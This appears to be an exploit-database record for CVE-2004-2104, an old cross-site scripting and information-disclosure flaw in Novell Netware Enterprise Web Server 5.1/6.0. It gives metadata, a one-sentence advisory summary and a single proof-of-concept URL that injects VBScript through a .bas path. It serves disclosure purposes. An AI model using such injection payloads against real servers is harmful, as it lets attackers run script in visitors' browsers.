Novell Netware Enterprise Web Server 5.1/6.0 - env.bas Information Disclosure
Author: Rafel Ivgi The-Insider
type: remote
platform: netware
port:
date_added: 2004-01-23
date_updated: 2012-12-23
verified: 1
codes: CVE-2004-2104;OSVDB-3715
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/9479/info
Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server.
http://www.example.com/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas